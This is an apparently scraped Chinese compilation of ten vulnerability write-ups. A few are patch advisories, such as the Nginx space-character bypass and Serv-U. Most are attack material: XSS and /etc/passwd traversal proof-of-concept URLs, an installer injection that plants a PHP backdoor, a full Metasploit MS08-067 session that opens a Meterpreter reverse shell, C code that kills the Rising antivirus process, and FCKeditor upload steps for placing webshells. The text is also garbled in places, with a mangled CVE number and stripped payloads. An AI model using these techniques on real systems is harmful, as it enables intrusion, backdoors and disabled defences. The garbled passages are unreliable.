Nginx 安全漏洞 (CVE4547)漏洞预警
“托马斯”通过精心收集,向本站投稿了10篇Nginx 安全漏洞 (CVE4547)漏洞预警,下面是小编帮大家整理后的Nginx 安全漏洞 (CVE4547)漏洞预警,希望对大家带来帮助,欢迎大家分享。
篇1:ServU多个安全漏洞漏洞预警
受影响系统:
serv-u serv-u 15.x
描述:
--------------------------------------------------------------------------------
Serv-U是一种使用广泛的FTP服务器程序,
Serv-U 15.1.0.458之前版本没有验证用户名称时会返回不同的响应,这可导致枚举有效的用户名称,某些用户输入没有正确过滤即返回给用户,这可导致在用户浏览器会话中执行任意HTML和脚本代码,
<*来源:vendor
链接:secunia.com/advisories/58991/
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
serv-u
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.serv-u.com/releasenotes/
篇2:Nginx 安全漏洞 (CVE4547)漏洞预警
Nginx 的安全限制可能会被某些请求给忽略,当我们通过例如下列方式进行 URL 访问限制的时候,如果攻击者使用一些没经过转义的空格字符(无效的 HTTP 协议,但从 Nginx 0.8.41 开始因为考虑兼容性的问题予以支持)那么这个限制可能无效:
location /protected/ {
deny all;
}
当请求的是 “/foo /../protected/file” 这样的 URL (静态文件,但 foo 后面有一个空格结尾) 或者是如下的配置:
location ~ .php$ {
fastcgi_pass …
}
当我们请求 “/file �.php” 时就会绕过限制,
Nginx 安全漏洞 (CVE20134547)漏洞预警
,
该问题影响 nginx 0.8.41 – 1.5.6.
该问题已经在 Nginx 1.5.7 和 1.4.4 版本中修复。
补丁程序在:
nginx.org/download/patch.2013.space.txt
配置上临时的解决办法是:
if ($request_uri ~ ” “) {
return 444;
}
篇3:TinyWebGallery 1.8.3版多个安全漏洞漏洞预警
TinyWebGallery是一款php相册程序,TinyWebGallery 1.8.3中包含多个安全漏洞,包括目录遍历和XSS,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
Script. TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: www.tinywebgallery.com
[+]poc:
~~~~~~~~~
localhost/twg183/admin/index.php?sview=“onmouseover=alert(String.fromCharCode(88,83,83));”
localhost/twg183/admin/index.php?tview=“onmouseover=alert(String.fromCharCode(88,83,83));”
localhost/twg183/admin/index.php?dir=
localhost/twg183/admin/index.php?action=chmod&item=
localhost/twg183/twg183/admin/index.php?action=chmod&item=“>
localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16090
篇4:eliteCMS安装文件未验证 + 一句话写入安全漏洞漏洞预警
eliteCMS的安装程序安装结束后未作锁定,导致 可以通过访问安装程序地址进行重复安装
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码:
...
elseif ($_GET['step'] == ”4“) {
$file = ”../admin/includes/config.php“;
$write = ”
$write .= “/**n”;
$write .= “*n”;
$write .= “*eliteCMS-The LightweightCMS Copyright elite-graphix.net.n”;
...略...
$write .= “*n”;
$write .= “*/n”;
$write .= “n”;
$write .= “define(”DB_SERVER“, ”{$_SESSION['DB_SERVER']}“);n”;
$write .= “define(”DB_NAME“, ”{$_SESSION['DB_NAME']}“);n”;
$write .= “define(”DB_USER“, ”{$_SESSION['DB_USER']}“);n”;
$write .= “define(”DB_PASS“, ”{$_SESSION['DB_PASS']}“);n”;
$write .= “$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);n”;
$write .= “if (!$connection) {n”;
$write .= “ die(”Database connection failed“ .mysql_error);n”;
$write .= “ n”;
$write .= “} n”;
$write .= “$db_select = mysql_select_db(DB_NAME, $connection);n”;
$write .= “if (!$db_select) {n”;
$write .= “ die(”Database select failed“ .mysql_error());n”;
$write .= “ n”;
$write .= “} n”;
$write .= “?>n”;
$writer = fopen($file, 'w');
...
在看代码:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
取值未作任何验证
如果将数据库名POST数据:
“?>
将导致一句话后门写入/admin/includes/config.php
篇5:MS08067漏洞漏洞预警
这个漏洞已经暴露了很久了,这里我就不说原理了我也不会,所以直接用metasploit操作一下,大牛请绕过
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script. results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
篇6: XSIO漏洞漏洞预警
文章作者:aullik5
原始出处:hi.baidu.com/aullik5/blog ... a02c6785352416.html
今天要讲的这个漏洞是一个非常猥琐的漏洞,
XSIO漏洞漏洞预警
。
大部分网站都有这个漏洞,不光是百度。
什么是XSIO,为什么说它猥琐呢?
XSIO是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网页的任意位置。
那么我们就可以用这张图片去覆盖网页上的任意一个位置,包括网站的banner,包括一个link、一个button。
这就可以导致页面破坏。而给图片设置一个链接后,很显然就可以起到一个钓鱼的作用。
XSIO漏洞:
由于对正常的HTML 标签 是没有做过滤的,所以我们可以用这些标签来实施XSIO攻击,
在百度,发blog是在一个table里,所以我们要先把table闭合掉,然后再插入合适的图片。
如以下代码:
复制内容到剪贴板
代码:
百度.jpg(40.08 KB)
-10-21 20:50
如图:匿名用户的头像被我覆盖到了banner处.
在实施具体攻击时,可以用图片覆盖link或者banner,当别人点击原本是link或button时,将跳到我们的恶意网站去。
所以说,这是一个非常猥琐的漏洞!
欲知后事如何,且听下回分解!
PS: 本次活动仅仅是个人行为,与任何组织或集体无关.
从明天开始,将进入我们的XSS之旅。
篇7:DeepSoft.com.sys.Servlet上传漏洞漏洞预警
作者:hackdn
注明
JSP+MSSQL的系统,国外应用广,出在注册上传上,过滤不严,修改下面POST,上传JSP
要上载的照片:
DeepSoft.com.sys.Servlet上传漏洞漏洞预警
,
文件大小没有限制,只是“*.ai,*.psd”文件可能上传后无法显示而已。”>
篇8:GBK字符编码(字符集)缺陷导致web安全漏洞漏洞预警
很多时候,字符编码使用,我们不会太过在意的,象中文网站,我们一般用gb2312,gbk,gb18030,也可以用utf-8。但是,可能我们不知道,选择不同编码,可能因此导致程序本身设计缺陷。
多字节编码由来
我们先来看看最常用的,最小字符集是ascii,对应的二级制描述是00-7F 。也是我们计算机使用最早通用的字符集。前期几乎可以表示所有所有英文字符。后来,我们发现想用此表示中文字符。发现远远不够了。常见中文就有7000多个字符。ascii码就只有128字符,只有0-127编码位置。因此,我们想法就是,怎么样做更大字符集,并且保证兼容ascii编码。要支持更多字符,选择更大字符集。我们只能用多个字节来描述一个字符了。一般做法是:每个字节值都大于>7F,如果是多个字节,那么就是:[>7F][>7F]。 这样编码,保证很好的与ascii区分开,有扩大了字符集。想gb2312范围在[0xA1-0xF7][0xA1-0xFE](中间很多没有填满),它完全保证所有字节在A0之上,也就完全满足在7F之上了。
GBK编码漏洞缘由
通过上面的分析,我们知道gb2312编码是很好的跟ascii码分开了。 那么我们看看,GBK编码呢,它是完全兼容gb2312(就是说在gb2312字符集中每个字符位置,与gbk字符集里面位置完全一致,而且包含于gb2312),但是,它有2万多个字符。从上面看,只能选择往下排序了。 就是从A1A0往下排了,我们发现它编码实际范围是:[0x81-0xFE]([0x40-0x7E|0x80-0xFE] ),我们发现由2个字节组成,首字节范围在7F之上,而第2个字节,有一部分在0×40-0x7E了。这就是导致bug原因。我们看看下面例子吧!
从ASCII码表中,我们知道包含字符有:“ A-Za-z@[ ]^_`{|}~”,一共有63字符呢。
选择gbk编码,运行上面代码,就一条简单的命令导致出现错误,说字符串 赋值 没有结束! 呵呵,估计很多人看到这个就会认为是php 出Bug了,
电脑资料
但是,如果我们变成$a=”a”,发现可以正常运行了。是不是觉得很奇葩啦!!
原因分析:我们知道文件存在磁盘都是二级制方式,无论你存什么字符,最终都是以该字符的在所选字符集中字符编码保存。php解析时候,最新分析单元是字节。无论你是多字节,单字节字符。最终都是按照字节来处理的。 “” GBK编码是 D55C,php按字节来解释,5C对应字符是“” 字符。后面直接跟个‘”’,相当于被转义了。 因为没有闭合,因此出现错误! 。 大家看出问题所在了吧,按自己处理的话,会自然把多字节拆成单字节了。这样就会出现很多奇怪问题了。
总结:分析了多字节编码过程,以及产生漏洞原因。其实,我们很多程序语言里面,都会以单个字节来解析的。这样,当你多字节中文中,刚好有字节落在特殊位置,将会出现奇怪的问题。而且,还将给系统带来本身的漏洞,后面我再说说,GBK编码缺陷,导致漏洞的实例吧!欢迎交流!
篇9:瑞星0day漏洞漏洞预警
编写成程序后双击运行直接K掉瑞星(重起也没用)
以下是漏洞利用代码
------------------------------------------------------------------------------
DWORD GetProcessIdFromName(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
do
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
} while(1);
CloseHandle(hSnapshot);
return id;
}
DWORD GetProcessID(char *FileName)
{
HANDLE myhProcess;
PROCESSENTRY32 mype;
BOOL mybRet;
//进行进程快照
myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS快照所有进程
//开始进程查找
mybRet=Process32First(myhProcess,&mype);
//循环比较,得出ProcessID
while(mybRet)
{
if(strcmp(FileName,mype.szExeFile)==0)
return mype.th32ProcessID;
else
mybRet=Process32Next(myhProcess,&mype);
}
return 0;
}
void killProcess(CString www ,LPCTSTR name,char *xyz)
{
DWORD nPid = 0;
HANDLE hProcess;
DWORD nExitCode = 0;
DWORD nAddress = 0x1000;
nPid=GetProcessIdFromName(name);
hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
while ( nAddress <= 0x7FFFF000 )
{
GetExitCodeProcess(hProcess, &nExitCode);
if (nExitCode != STILL_ACTIVE)
{
break;
}
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
nAddress += 0x1000;
}
篇10:kingcms5.0/5.1漏洞漏洞预警
1,kingcms 5.0 fckeditor的默认路径在 admin/system/editor/FCKeditor/editor/fckeditor.Html
把本地的马命名为 hx.asp;jpg 注意看 jpg前面没有点了..
OK了..其实以后做站结合fckeditor这类的编辑器..最好加个验证..只有管理才能访问..这样或者比较好吧
2。编辑器路径:/admin/system/editor/
利用方式:访问www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹,
然后访问www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp,选择刚创建的qing.asp文件夹并上传图片木马,可以上传包含一句话内容的图片,然后使用一句话客户端连接。
3。该系统后台也是比较脆弱的,若能成功登陆后台拿webshell比较简单,后台中有个webftp的功能,可以上传任意文件。默认数据库地址为/db/King#Content#Management#System.mdb,下载的时候将#替换成%23后下载。
有很多存在FCKEDITOR编辑器的基本存在该漏洞 与其说是KINGCMS的漏洞不如说是FCKEDITOR的漏洞
【Nginx 安全漏洞 (CVE4547)漏洞预警】相关文章:
文档为doc格式
